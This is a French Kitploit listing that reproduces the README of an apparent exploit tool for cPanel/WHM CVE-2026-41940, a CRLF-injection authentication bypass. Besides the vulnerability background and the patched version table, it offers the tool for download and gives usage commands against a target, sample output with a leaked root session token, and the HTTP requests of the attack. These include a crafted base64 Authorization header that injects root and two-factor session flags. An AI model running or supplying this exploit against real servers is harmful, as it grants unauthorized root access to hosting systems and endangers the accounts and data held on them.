Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cPanel-WHM-CVE-2026-41940-auth-bypass-exploit — Exploit critique de contournement d'authentification pour cPanel/WHM CVE-2026-41940. Exploite l'injection CRLF dans le démon cpsrvd pour obtenir un accès root WHM sans identifiants. Inclut la détection de version, une journalisation verbose, le support des proxys, le rapport JSON et l'énumération de comptes post-exploitation. Réservé aux tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/cerberusmrxi/cpanel-whm-cve-2026-41940-auth-bypass-exploit
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubcerberusmrxi/cpanel-whm-cve-2026-41940-auth-bypass-exploit

cPanel-WHM-CVE-2026-41940-auth-bypass-exploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
212il y a 2 moisPas encore vérifié

À propos

Exploit critique de contournement d'authentification pour cPanel/WHM CVE-2026-41940. Exploite l'injection CRLF dans le démon cpsrvd pour obtenir un accès root WHM sans identifiants. Inclut la détection de version, une journalisation verbose, le support des proxys, le rapport JSON et l'énumération de comptes post-exploitation. Réservé aux tests de sécurité autorisés.

Partager

CVE-2026-41940 - Exploit de contournement d'authentification de cPanel & WHM

PythonLicenseCVECVSSStatus

Contournement critique de l'authentification par injection CRLF dans le démon cpsrvd de cPanel/WHM


📋 Vue d'ensemble

CVE-2026-41940 est une vulnérabilité critique de contournement d'authentification dans cPanel & WHM qui permet à des attaquants distants non authentifiés d'obtenir un accès administratif de niveau root au serveur. La vulnérabilité existe dans la gestion des sessions du démon cpsrvd, plus précisément dans Cpanel/Session.pm, où la neutralisation inappropriée des délimiteurs de ligne (CRLF) dans le cookie whostmgrsession et les en-têtes Authorization permet l'injection de paramètres de session.

Score CVSSType d'exploitImpactVecteur d'attaque
9.8Contournement d'authentificationAccès rootRéseau
c

⚡ Fonctionnalités clés

Cet outil d'exploitation offre les fonctionnalités clés suivantes :

  • 🔓 Contournement d'authentification - Obtenir un accès WHM root sans identifiants

  • 🛡️ Techniques de contournement multiples - Essaie automatiquement différentes méthodes de vérification

  • 🌐 Prise en charge des proxys - Achemine le trafic via des proxys HTTP/HTTPS

  • 📊 Rapports JSON - Génère des rapports d'évaluation détaillés

  • 📝 Journalisation complète - Mode débogage verbeux avec horodatages

  • 🔍 Détection de version - Détecte et vérifie automatiquement les versions vulnérables

  • 👥 Énumération des comptes - Liste tous les comptes cPanel après exploitation

  • 🎯 Points de terminaison multiples - Essaie divers points de terminaison API pour la vérification


🚨 Détails de la vulnérabilité

AttributValeur
ID CVECVE-2026-41940
Score CVSS9.8 (Critique)
Type de vulnérabilitéContournement d'authentification par injection CRLF
Composant affectéDémon cpsrvd (Cpanel/Session.pm)
Vecteur d'attaqueRéseau
ImpactAccès root complet
ExploitationÀ distance, sans authentification

🔬 Analyse technique

La vulnérabilité provient de deux problèmes principaux :

  1. Injection CRLF dans le stockage de session - La fonction saveSession ne parvient pas à neutraliser les caractères de nouvelle ligne (\n) dans le champ pass avant de l'écrire dans le fichier de session, ce qui permet l'injection de paramètres de session arbitraires.

  2. Contournement du codage conditionnel - Lorsque le cookie de session ne contient pas la partie ob (le segment après la virgule), la valeur pass est écrite sans codage (en clair), ce qui permet l'injection de séquences CRLF.

🎯 Versions affectées

Canal de publicationVulnérable jusqu'àVersion corrigée
11.110.x11.110.0.9611.110.0.97
11.118.x11.118.0.6211.118.0.63
11.126.x11.126.0.5311.126.0.54
11.132.x11.132.0.2811.132.0.29
11.134.x11.134.0.1911.134.0.20
11.136.x11.136.0.411.136.0.5

📦 Installation

Prérequis

# Python 3.6 or higher required
python3 --version

# Install required packages
pip install -r requirements.txt

Fichier requirements

requests>=2.28.0
urllib3>=1.26.0

Cloner le dépôt

git clone https://github.com/CerberusMrXi/cPanel-WHM-CVE-2026-41940-auth-bypass-exploit.git
cd cPanel-WHM-CVE-2026-41940-auth-bypass-exploit

🚀 Utilisation

Utilisation de base

python3 exploit.py --target https://target.com:2087

Utilisation avancée

# Verbose mode with debug output
python3 exploit.py --target https://target.com:2087 --verbose

# Through proxy
python3 exploit.py --target https://target.com:2087 --proxy http://127.0.0.1:8080

# Save report and list accounts
python3 exploit.py --target https://target.com:2087 --output report.json --list-accounts

# Custom timeout
python3 exploit.py --target https://target.com:2087 --timeout 30

Exemple de sortie

=======================================================
 CVE-2026-41940 - cPanel/WHM Authentication Bypass
 Critical CRLF Injection in cpsrvd (CVSS: 9.8 )
 Exploit Version: 1.0
=======================================================
 Target      : https://target.com:2087
 Started     : 2026-07-26 22:23:18
=======================================================
2026-07-26 22:23:18 [INFO] Detecting cPanel/WHM version...
2026-07-26 22:23:19 [INFO] Version: 11.110.0.85 - Vulnerable
2026-07-26 22:23:19 [INFO] Attempting to mint pre-authentication session...
2026-07-26 22:23:20 [INFO] Pre-authentication session obtained successfully
2026-07-26 22:23:20 [INFO] Injecting CRLF payload via Authorization header...
2026-07-26 22:23:21 [INFO] Token leaked: /cpsess1234567890
2026-07-26 22:23:21 [INFO] Verifying root access with multiple bypass techniques...
2026-07-26 22:23:25 [INFO] Access verified with URL format: /cpsess-{token}

=======================================================
 EXPLOIT SUCCESSFUL
=======================================================
 Target              : https://target.com:2087
 Token               : /cpsess1234567890
 Admin URL           : https://target.com:2087/cpsess1234567890/
 Version             : 11.110.0.85
 Verification Method : url_format
 Completed           : 2026-07-26 22:23:25
=======================================================

[!] Access WHM with the token above
[!] Use the token in all subsequent requests
[!] Example: curl -k "https://target.com:2087/cpsess1234567890/json-api/version?api.version=1"
=======================================================

🔧 Arguments de ligne de commande

ArgumentCourtRequisDescription
--target-t✅URL cible (par ex., https://target.com:2087 )
--verbose-v❌Activer la sortie verbeuse/débogage
--proxy-p❌URL du proxy (par ex., http://127.0.0.1:8080 )
--output-o❌Fichier de sortie pour le rapport JSON
--timeout❌Délai d'expiration des requêtes en secondes (défaut : 10)
--list-accounts-l❌Lister les comptes cPanel après exploitation réussie
--version❌Afficher la version de l'exploit

🔬 Méthodologie d'exploitation

Étape 1 : Obtenir une session pré-authentification

L'exploit obtient d'abord un cookie de session pré-authentification en tentant une connexion échouée :

POST /login/?login_only=1 HTTP/1.1
Host: target.com:2087
Content-Type: application/x-www-form-urlencoded

user=root&pass=wrong_pass

Réponse :

Set-Cookie: whostmgrsession=base64_encoded_data

Étape 2 : Injection CRLF

L'en-tête Authorization conçu injecte des paramètres de session malveillants :

GET / HTTP/1.1
Host: target.com:2087
Authorization: Basic cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x
Cookie: whostmgrsession=[SESSION_BASE]
Télécharger l’outil